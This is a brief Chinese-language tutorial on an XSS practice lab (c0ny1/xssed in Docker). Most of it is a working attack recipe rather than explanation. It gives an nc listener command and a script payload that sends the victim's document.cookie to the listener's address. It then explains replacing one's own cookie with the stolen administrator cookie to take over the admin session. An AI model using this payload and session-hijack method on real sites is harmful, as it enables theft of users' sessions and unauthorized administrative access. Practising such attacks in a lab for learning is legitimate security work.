00 环境搭建
XSS靶场c0ny1/xssed
docker pull c0ny1/xssed
docker run -d -p 85:80 c0ny1/xssed
http://172.16.243.133:85/
01 XSS漏洞识别
极简式
<img src=x>
获取cookie(重点)
启动一个nc服务
nc -lvvp 888
使用payload插入存储型/反射性XSS ,一般是留言,公告等位置。
<script> document.location="http://172.16.243.129:888?id="+document.cookie</script>
nc获取到cookie
将cookie替换成浏览器cookie并刷新页面
核心知识点是普通用户获取管理员用户cookie ,刷新页面后得到管理员权限。